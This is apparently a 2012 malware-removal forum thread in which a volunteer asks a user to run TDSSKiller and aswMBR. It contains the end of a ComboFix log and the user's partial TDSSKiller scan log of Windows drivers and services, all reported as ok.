[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_233_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_233_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Bonjour\mDNSResponder.exe
c:\windows\SysWOW64\PnkBstrA.exe
c:\program files (x86)\Motorola\MotoHelper\MotoHelperAgent.exe
.
**************************************************************************
.
Completion time: 2012-04-16 21:14:18 - machine was rebooted
ComboFix-quarantined-files.txt 2012-04-16 20:14
.
Pre-Run: 102,328,553,472 bytes free
Post-Run: 102,103,523,328 bytes free
.
- - End Of File - - E96B82BE8B654D66FAD044CF313FEF44

Thanks

#4 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:12:54 AM

Posted 16 April 2012 - 05:54 PM

Greetings

I want you to run these next,

tdsskiller:

Please read carefully and follow these steps.
  • Download TDSSKiller and save it to your Desktop.
  • doubleclick on TDSSKiller.exe to run the application, then on Start Scan.
  • If an infected file is detected, the default action will be Cure, click on Continue.
  • If a suspicious file is detected, the default action will be Skip, click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • If no reboot is require, click on Report. A log file should appear. Please copy and paste the contents of that file here.
  • If a reboot is required, the report can also be found in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.

Please download aswMBR to your desktop.
  • Double click the aswMBR.exe icon to run it
  • it will ask to download extra definitions - ALLOW IT
  • Click the Scan button to start the scan
  • On completion of the scan, click the save log button, save it to your desktop and post it in your next reply.

If you have any problems running either one come back and let me know

please reply with the reports from TDSSKiller and aswMBR

Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#5 vinnie946

vinnie946
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:54 AM

Posted 17 April 2012 - 02:42 PM

tdsskiller:

16:50:08.0360 1864 TDSS rootkit removing tool 2.7.28.0 Apr 10 2012 16:54:05
16:50:09.0187 1864 ============================================================
16:50:09.0187 1864 Current date / time: 2012/04/17 16:50:09.0187
16:50:09.0187 1864 SystemInfo:
16:50:09.0187 1864
16:50:09.0187 1864 OS Version: 6.1.7601 ServicePack: 1.0
16:50:09.0187 1864 Product type: Workstation
16:50:09.0187 1864 ComputerName: VINCENT-PC
16:50:09.0187 1864 UserName: Vincent
16:50:09.0187 1864 Windows directory: C:\Windows
16:50:09.0187 1864 System windows directory: C:\Windows
16:50:09.0187 1864 Running under WOW64
16:50:09.0187 1864 Processor architecture: Intel x64
16:50:09.0187 1864 Number of processors: 2
16:50:09.0187 1864 Page size: 0x1000
16:50:09.0187 1864 Boot type: Normal boot
16:50:09.0187 1864 ============================================================
16:50:10.0123 1864 Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 (298.09 Gb), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
16:50:10.0123 1864 \Device\Harddisk0\DR0:
16:50:10.0138 1864 MBR used
16:50:10.0138 1864 \Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800
16:50:10.0138 1864 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0x253C9800
16:50:10.0154 1864 Initialize success
16:50:10.0154 1864 ============================================================
16:50:16.0831 5136 ============================================================
16:50:16.0831 5136 Scan started
16:50:16.0831 5136 Mode: Manual;
16:50:16.0831 5136 ============================================================
16:50:18.0360 5136 1394ohci (a87d604aea360176311474c87a63bb88) C:\Windows\system32\drivers\1394ohci.sys
16:50:18.0360 5136 1394ohci - ok
16:50:18.0422 5136 ACPI (d81d9e70b8a6dd14d42d7b4efa65d5f2) C:\Windows\system32\drivers\ACPI.sys
16:50:18.0422 5136 ACPI - ok
16:50:18.0453 5136 AcpiPmi (99f8e788246d495ce3794d7e7821d2ca) C:\Windows\system32\drivers\acpipmi.sys
16:50:18.0453 5136 AcpiPmi - ok
16:50:18.0547 5136 AdobeARMservice (62b7936f9036dd6ed36e6a7efa805dc0) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
16:50:18.0547 5136 AdobeARMservice - ok
16:50:18.0672 5136 AdobeFlashPlayerUpdateSvc (459ac130c6ab892b1cd5d7544626efc5) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
16:50:18.0672 5136 AdobeFlashPlayerUpdateSvc - ok
16:50:18.0765 5136 adp94xx (2f6b34b83843f0c5118b63ac634f5bf4) C:\Windows\system32\DRIVERS\adp94xx.sys
16:50:18.0765 5136 adp94xx - ok
16:50:18.0812 5136 adpahci (597f78224ee9224ea1a13d6350ced962) C:\Windows\system32\DRIVERS\adpahci.sys
16:50:18.0812 5136 adpahci - ok
16:50:18.0859 5136 adpu320 (e109549c90f62fb570b9540c4b148e54) C:\Windows\system32\DRIVERS\adpu320.sys
16:50:18.0859 5136 adpu320 - ok
16:50:18.0890 5136 AeLookupSvc (4b78b431f225fd8624c5655cb1de7b61) C:\Windows\System32\aelupsvc.dll
16:50:18.0890 5136 AeLookupSvc - ok
16:50:18.0952 5136 AESTFilters (a6fb9db8f1a86861d955fd6975977ae0) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe
16:50:18.0952 5136 AESTFilters - ok
16:50:19.0015 5136 AFD (1c7857b62de5994a75b054a9fd4c3825) C:\Windows\system32\drivers\afd.sys
16:50:19.0015 5136 AFD - ok
16:50:19.0124 5136 AgereSoftModem (98022774d9930ecbb292e70db7601df6) C:\Windows\system32\DRIVERS\agrsm64.sys
16:50:19.0140 5136 AgereSoftModem - ok
16:50:19.0186 5136 agp440 (608c14dba7299d8cb6ed035a68a15799) C:\Windows\system32\drivers\agp440.sys
16:50:19.0186 5136 agp440 - ok
16:50:19.0233 5136 ALG (3290d6946b5e30e70414990574883ddb) C:\Windows\System32\alg.exe
16:50:19.0233 5136 ALG - ok
16:50:19.0264 5136 aliide (5812713a477a3ad7363c7438ca2ee038) C:\Windows\system32\drivers\aliide.sys
16:50:19.0264 5136 aliide - ok
16:50:19.0280 5136 amdide (1ff8b4431c353ce385c875f194924c0c) C:\Windows\system32\drivers\amdide.sys
16:50:19.0280 5136 amdide - ok
16:50:19.0311 5136 AmdK8 (7024f087cff1833a806193ef9d22cda9) C:\Windows\system32\DRIVERS\amdk8.sys
16:50:19.0311 5136 AmdK8 - ok
16:50:19.0389 5136 AmdPPM (1e56388b3fe0d031c44144eb8c4d6217) C:\Windows\system32\DRIVERS\amdppm.sys
16:50:19.0389 5136 AmdPPM - ok
16:50:19.0420 5136 amdsata (d4121ae6d0c0e7e13aa221aa57ef2d49) C:\Windows\system32\drivers\amdsata.sys
16:50:19.0420 5136 amdsata - ok
16:50:19.0436 5136 amdsbs (f67f933e79241ed32ff46a4f29b5120b) C:\Windows\system32\DRIVERS\amdsbs.sys
16:50:19.0452 5136 amdsbs - ok
16:50:19.0467 5136 amdxata (540daf1cea6094886d72126fd7c33048) C:\Windows\system32\drivers\amdxata.sys
16:50:19.0467 5136 amdxata - ok
16:50:19.0514 5136 ApfiltrService (05f1a0a81a98cf27e3f028213fb6c36a) C:\Windows\system32\DRIVERS\Apfiltr.sys
16:50:19.0530 5136 ApfiltrService - ok
16:50:19.0592 5136 AppID (89a69c3f2f319b43379399547526d952) C:\Windows\system32\drivers\appid.sys
16:50:19.0592 5136 AppID - ok
16:50:19.0623 5136 AppIDSvc (0bc381a15355a3982216f7172f545de1) C:\Windows\System32\appidsvc.dll
16:50:19.0623 5136 AppIDSvc - ok
16:50:19.0686 5136 Appinfo (3977d4a871ca0d4f2ed1e7db46829731) C:\Windows\System32\appinfo.dll
16:50:19.0686 5136 Appinfo - ok
16:50:19.0717 5136 AppMgmt (4aba3e75a76195a3e38ed2766c962899) C:\Windows\System32\appmgmts.dll
16:50:19.0717 5136 AppMgmt - ok
16:50:19.0764 5136 arc (c484f8ceb1717c540242531db7845c4e) C:\Windows\system32\DRIVERS\arc.sys
16:50:19.0764 5136 arc - ok
16:50:19.0795 5136 arcsas (019af6924aefe7839f61c830227fe79c) C:\Windows\system32\DRIVERS\arcsas.sys
16:50:19.0795 5136 arcsas - ok
16:50:19.0826 5136 AsyncMac (769765ce2cc62867468cea93969b2242) C:\Windows\system32\DRIVERS\asyncmac.sys
16:50:19.0826 5136 AsyncMac - ok
16:50:19.0842 5136 atapi (02062c0b390b7729edc9e69c680a6f3c) C:\Windows\system32\drivers\atapi.sys
16:50:19.0857 5136 atapi - ok
16:50:19.0904 5136 AudioEndpointBuilder (f23fef6d569fce88671949894a8becf1) C:\Windows\System32\Audiosrv.dll
16:50:19.0904 5136 AudioEndpointBuilder - ok
16:50:19.0920 5136 AudioSrv (f23fef6d569fce88671949894a8becf1) C:\Windows\System32\Audiosrv.dll
16:50:19.0920 5136 AudioSrv - ok
16:50:19.0998 5136 AxInstSV (a6bf31a71b409dfa8cac83159e1e2aff) C:\Windows\System32\AxInstSV.dll
16:50:19.0998 5136 AxInstSV - ok
16:50:20.0060 5136 b06bdrv (3e5b191307609f7514148c6832bb0842) C:\Windows\system32\DRIVERS\bxvbda.sys
16:50:20.0060 5136 b06bdrv - ok
16:50:20.0107 5136 b57nd60a (b5ace6968304a3900eeb1ebfd9622df2) C:\Windows\system32\DRIVERS\b57nd60a.sys
16:50:20.0107 5136 b57nd60a - ok
16:50:20.0154 5136 BDESVC (fde360167101b4e45a96f939f388aeb0) C:\Windows\System32\bdesvc.dll
16:50:20.0154 5136 BDESVC - ok
16:50:20.0185 5136 Beep (16a47ce2decc9b099349a5f840654746) C:\Windows\system32\drivers\Beep.sys
16:50:20.0185 5136 Beep - ok
16:50:20.0232 5136 BFE (82974d6a2fd19445cc5171fc378668a4) C:\Windows\System32\bfe.dll
16:50:20.0247 5136 BFE - ok
16:50:20.0325 5136 BITS (1ea7969e3271cbc59e1730697dc74682) C:\Windows\system32\qmgr.dll
16:50:20.0341 5136 BITS - ok
16:50:20.0388 5136 blbdrive (61583ee3c3a17003c4acd0475646b4d3) C:\Windows\system32\DRIVERS\blbdrive.sys
16:50:20.0388 5136 blbdrive - ok
16:50:20.0512 5136 Bonjour Service (f832f1505ad8b83474bd9a5b1b985e01) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
16:50:20.0512 5136 Bonjour Service - ok
16:50:20.0575 5136 bowser (6c02a83164f5cc0a262f4199f0871cf5) C:\Windows\system32\DRIVERS\bowser.sys
16:50:20.0575 5136 bowser - ok
16:50:20.0637 5136 BrFiltLo (f09eee9edc320b5e1501f749fde686c8) C:\Windows\system32\DRIVERS\BrFiltLo.sys
16:50:20.0653 5136 BrFiltLo - ok
16:50:20.0653 5136 BrFiltUp (b114d3098e9bdb8bea8b053685831be6) C:\Windows\system32\DRIVERS\BrFiltUp.sys
16:50:20.0653 5136 BrFiltUp - ok
16:50:20.0684 5136 BridgeMP (5c2f352a4e961d72518261257aae204b) C:\Windows\system32\DRIVERS\bridge.sys
16:50:20.0684 5136 BridgeMP - ok
16:50:20.0715 5136 Browser (8ef0d5c41ec907751b8429162b1239ed) C:\Windows\System32\browser.dll
16:50:20.0715 5136 Browser - ok
16:50:20.0746 5136 Brserid (43bea8d483bf1870f018e2d02e06a5bd) C:\Windows\System32\Drivers\Brserid.sys
16:50:20.0746 5136 Brserid - ok
16:50:20.0762 5136 BrSerWdm (a6eca2151b08a09caceca35c07f05b42) C:\Windows\System32\Drivers\BrSerWdm.sys
16:50:20.0762 5136 BrSerWdm - ok
16:50:20.0778 5136 BrUsbMdm (b79968002c277e869cf38bd22cd61524) C:\Windows\System32\Drivers\BrUsbMdm.sys
16:50:20.0778 5136 BrUsbMdm - ok
16:50:20.0778 5136 BrUsbSer (a87528880231c54e75ea7a44943b38bf) C:\Windows\System32\Drivers\BrUsbSer.sys
16:50:20.0778 5136 BrUsbSer - ok
16:50:20.0824 5136 BTCFilterService (ff7c57973eead140062238c5a0b7d455) C:\Windows\system32\DRIVERS\motfilt.sys
16:50:20.0824 5136 BTCFilterService - ok
16:50:20.0840 5136 BTHMODEM (9da669f11d1f894ab4eb69bf546a42e8) C:\Windows\system32\DRIVERS\bthmodem.sys
16:50:20.0840 5136 BTHMODEM - ok
16:50:20.0887 5136 bthserv (95f9c2976059462cbbf227f7aab10de9) C:\Windows\system32\bthserv.dll
16:50:20.0887 5136 bthserv - ok
16:50:20.0902 5136 catchme - ok
16:50:20.0934 5136 cdfs (b8bd2bb284668c84865658c77574381a) C:\Windows\system32\DRIVERS\cdfs.sys
16:50:20.0949 5136 cdfs - ok
16:50:21.0043 5136 cdrom (f036ce71586e93d94dab220d7bdf4416) C:\Windows\system32\DRIVERS\cdrom.sys
16:50:21.0043 5136 cdrom - ok
16:50:21.0090 5136 CertPropSvc (f17d1d393bbc69c5322fbfafaca28c7f) C:\Windows\System32\certprop.dll
16:50:21.0090 5136 CertPropSvc - ok
16:50:21.0105 5136 circlass (d7cd5c4e1b71fa62050515314cfb52cf) C:\Windows\system32\DRIVERS\circlass.sys
16:50:21.0105 5136 circlass - ok
16:50:21.0136 5136 CLFS (fe1ec06f2253f691fe36217c592a0206) C:\Windows\system32\CLFS.sys
16:50:21.0136 5136 CLFS - ok
16:50:21.0214 5136 clr_optimization_v2.0.50727_32 (d88040f816fda31c3b466f0fa0918f29) C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
16:50:21.0214 5136 clr_optimization_v2.0.50727_32 - ok
16:50:21.0246 5136 clr_optimization_v2.0.50727_64 (d1ceea2b47cb998321c579651ce3e4f8) C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
16:50:21.0246 5136 clr_optimization_v2.0.50727_64 - ok
16:50:21.0324 5136 clr_optimization_v4.0.30319_32 (c5a75eb48e2344abdc162bda79e16841) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
16:50:21.0370 5136 clr_optimization_v4.0.30319_32 - ok
16:50:21.0402 5136 clr_optimization_v4.0.30319_64 (c6f9af94dcd58122a4d7e89db6bed29d) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
16:50:21.0402 5136 clr_optimization_v4.0.30319_64 - ok
16:50:21.0464 5136 clwvd (e13a438f9e51dd034730678e33b73290) C:\Windows\system32\DRIVERS\clwvd.sys
16:50:21.0464 5136 clwvd - ok
16:50:21.0526 5136 CmBatt (0840155d0bddf1190f84a663c284bd33) C:\Windows\system32\DRIVERS\CmBatt.sys
16:50:21.0526 5136 CmBatt - ok
16:50:21.0573 5136 cmdide (e19d3f095812725d88f9001985b94edd) C:\Windows\system32\drivers\cmdide.sys
16:50:21.0573 5136 cmdide - ok
16:50:21.0620 5136 CNG (c4943b6c962e4b82197542447ad599f4) C:\Windows\system32\Drivers\cng.sys
16:50:21.0636 5136 CNG - ok
16:50:21.0651 5136 Compbatt (102de219c3f61415f964c88e9085ad14) C:\Windows\system32\DRIVERS\compbatt.sys
16:50:21.0651 5136 Compbatt - ok
16:50:21.0682 5136 CompositeBus (03edb043586cceba243d689bdda370a8) C:\Windows\system32\drivers\CompositeBus.sys
16:50:21.0682 5136 CompositeBus - ok
16:50:21.0714 5136 COMSysApp - ok
16:50:21.0760 5136 crcdisk (1c827878a998c18847245fe1f34ee597) C:\Windows\system32\DRIVERS\crcdisk.sys
16:50:21.0760 5136 crcdisk - ok
16:50:21.0807 5136 CryptSvc (15597883fbe9b056f276ada3ad87d9af) C:\Windows\system32\cryptsvc.dll
16:50:21.0807 5136 CryptSvc - ok
16:50:21.0870 5136 CSC (54da3dfd29ed9f1619b6f53f3ce55e49) C:\Windows\system32\drivers\csc.sys
16:50:21.0885 5136 CSC - ok
16:50:21.0948 5136 CscService (3ab183ab4d2c79dcf459cd2c1266b043) C:\Windows\System32\cscsvc.dll
16:50:21.0963 5136 CscService - ok
16:50:22.0166 5136 DcomLaunch (5c627d1b1138676c0a7ab2c2c190d123) C:\Windows\system32\rpcss.dll
16:50:22.0166 5136 DcomLaunch - ok
16:50:22.0244 5136 defragsvc (3cec7631a84943677aa8fa8ee5b6b43d) C:\Windows\System32\defragsvc.dll
16:50:22.0244 5136 defragsvc - ok
16:50:22.0369 5136 DeviceMonitorService (6824007c0ecec46edd64d7a9d86eba84) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
16:50:22.0369 5136 DeviceMonitorService - ok
16:50:22.0416 5136 DfsC (9bb2ef44eaa163b29c4a4587887a0fe4) C:\Windows\system32\Drivers\dfsc.sys
16:50:22.0416 5136 DfsC - ok
16:50:22.0478 5136 Dhcp (43d808f5d9e1a18e5eeb5ebc83969e4e) C:\Windows\system32\dhcpcore.dll
16:50:22.0478 5136 Dhcp - ok
16:50:22.0540 5136 discache (13096b05847ec78f0977f2c0f79e9ab3) C:\Windows\system32\drivers\discache.sys
16:50:22.0540 5136 discache - ok
16:50:22.0587 5136 Disk (9819eee8b5ea3784ec4af3b137a5244c) C:\Windows\system32\DRIVERS\disk.sys
16:50:22.0603 5136 Disk - ok
16:50:22.0618 5136 Dnscache (16835866aaa693c7d7fceba8fff706e4) C:\Windows\System32\dnsrslvr.dll
16:50:22.0634 5136 Dnscache - ok
16:50:22.0650 5136 dot3svc (b1fb3ddca0fdf408750d5843591afbc6) C:\Windows\System32\dot3svc.dll
16:50:22.0650 5136 dot3svc - ok
16:50:22.0681 5136 DPS (b26f4f737e8f9df4f31af6cf31d05820) C:\Windows\system32\dps.dll
16:50:22.0696 5136 DPS - ok
16:50:22.0743 5136 drmkaud (9b19f34400d24df84c858a421c205754) C:\Windows\system32\drivers\drmkaud.sys
16:50:22.0743 5136 drmkaud - ok
16:50:22.0821 5136 DXGKrnl (f5bee30450e18e6b83a5012c100616fd) C:\Windows\System32\drivers\dxgkrnl.sys
16:50:22.0837 5136 DXGKrnl - ok
16:50:22.0884 5136 EagleX64 - ok
16:50:22.0930 5136 eamonm (13533557d01b88c83110d5cf749f14d7) C:\Windows\system32\DRIVERS\eamonm.sys
16:50:22.0930 5136 eamonm - ok
16:50:22.0962 5136 EapHost (e2dda8726da9cb5b2c4000c9018a9633) C:\Windows\System32\eapsvc.dll
16:50:22.0962 5136 EapHost - ok
16:50:23.0055 5136 ebdrv (dc5d737f51be844d8c82c695eb17372f) C:\Windows\system32\DRIVERS\evbda.sys
16:50:23.0102 5136 ebdrv - ok
16:50:23.0164 5136 EFS (c118a82cd78818c29ab228366ebf81c3) C:\Windows\System32\lsass.exe
16:50:23.0164 5136 EFS - ok
16:50:23.0242 5136 ehdrv (e097728129e7b79bf1089d7aef42332b) C:\Windows\system32\DRIVERS\ehdrv.sys
16:50:23.0242 5136 ehdrv - ok
16:50:23.0305 5136 ehRecvr (c4002b6b41975f057d98c439030cea07) C:\Windows\ehome\ehRecvr.exe
16:50:23.0320 5136 ehRecvr - ok
16:50:23.0336 5136 ehSched (4705e8ef9934482c5bb488ce28afc681) C:\Windows\ehome\ehsched.exe
16:50:23.0352 5136 ehSched - ok
16:50:23.0414 5136 ekrn (c7bb95cf9631aa401e4aded1648f6af7) C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe
16:50:23.0430 5136 ekrn - ok
16:50:23.0523 5136 elxstor (0e5da5369a0fcaea12456dd852545184) C:\Windows\system32\DRIVERS\elxstor.sys
16:50:23.0539 5136 elxstor - ok
16:50:23.0601 5136 epfw (198c6fbc30bbd9632ea051203dccf204) C:\Windows\system32\DRIVERS\epfw.sys
16:50:23.0601 5136 epfw - ok
16:50:23.0632 5136 EpfwLWF (56de463f517710a8aa44eef82c35b3c9) C:\Windows\system32\DRIVERS\EpfwLWF.sys
16:50:23.0632 5136 EpfwLWF - ok
16:50:23.0648 5136 epfwwfp (710b0442bb2f99278d7b8e02a8849c11) C:\Windows\system32\DRIVERS\epfwwfp.sys
16:50:23.0648 5136 epfwwfp - ok
16:50:23.0679 5136 ErrDev (34a3c54752046e79a126e15c51db409b) C:\Windows\system32\drivers\errdev.sys
16:50:23.0695 5136 ErrDev - ok
16:50:23.0726 5136 EventSystem (4166f82be4d24938977dd1746be9b8a0) C:\Windows\system32\es.dll
16:50:23.0742 5136 EventSystem - ok
16:50:23.0773 5136 exfat (a510c654ec00c1e9bdd91eeb3a59823b) C:\Windows\system32\drivers\exfat.sys
16:50:23.0773 5136 exfat - ok
16:50:23.0788 5136 fastfat (0adc83218b66a6db380c330836f3e36d) C:\Windows\system32\drivers\fastfat.sys
16:50:23.0788 5136 fastfat - ok
16:50:23.0882 5136 Fax (dbefd454f8318a0ef691fdd2eaab44eb) C:\Windows\system32\fxssvc.exe
16:50:23.0898 5136 Fax - ok
16:50:23.0913 5136 fdc (d765d19cd8ef61f650c384f62fac00ab) C:\Windows\system32\DRIVERS\fdc.sys
16:50:23.0913 5136 fdc - ok
16:50:23.0944 5136 fdPHost (0438cab2e03f4fb61455a7956026fe86) C:\Windows\system32\fdPHost.dll
16:50:23.0944 5136 fdPHost - ok
16:50:23.0960 5136 FDResPub (802496cb59a30349f9a6dd22d6947644) C:\Windows\system32\fdrespub.dll
16:50:23.0960 5136 FDResPub - ok
16:50:23.0976 5136 FileInfo (655661be46b5f5f3fd454e2c3095b930) C:\Windows\system32\drivers\fileinfo.sys
16:50:23.0976 5136 FileInfo - ok
16:50:24.0007 5136 Filetrace (5f671ab5bc87eea04ec38a6cd5962a47) C:\Windows\system32\drivers\filetrace.sys
16:50:24.0007 5136 Filetrace - ok
16:50:24.0022 5136 flpydisk (c172a0f53008eaeb8ea33fe10e177af5) C:\Windows\system32\DRIVERS\flpydisk.sys
16:50:24.0022 5136 flpydisk - ok
16:50:24.0069 5136 FltMgr (da6b67270fd9db3697b20fce94950741) C:\Windows\system32\drivers\fltmgr.sys
16:50:24.0069 5136 FltMgr - ok
16:50:24.0132 5136 FontCache (5c4cb4086fb83115b153e47add961a0c) C:\Windows\system32\FntCache.dll
16:50:24.0147 5136 FontCache - ok
16:50:24.0210 5136 FontCache3.0.0.0 (a8b7f3818ab65695e3a0bb3279f6dce6) C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
16:50:24.0225 5136 FontCache3.0.0.0 - ok
16:50:24.0272 5136 FsDepends (d43703496149971890703b4b1b723eac) C:\Windows\system32\drivers\FsDepends.sys
16:50:24.0272 5136 FsDepends - ok
16:50:24.0303 5136 Fs_Rec (6bd9295cc032dd3077c671fccf579a7b) C:\Windows\system32\drivers\Fs_Rec.sys
16:50:24.0303 5136 Fs_Rec - ok
16:50:24.0350 5136 fvevol (1f7b25b858fa27015169fe95e54108ed) C:\Windows\system32\DRIVERS\fvevol.sys
16:50:24.0350 5136 fvevol - ok
16:50:24.0397 5136 gagp30kx (8c778d335c9d272cfd3298ab02abe3b6) C:\Windows\system32\DRIVERS\gagp30kx.sys
16:50:24.0412 5136 gagp30kx - ok
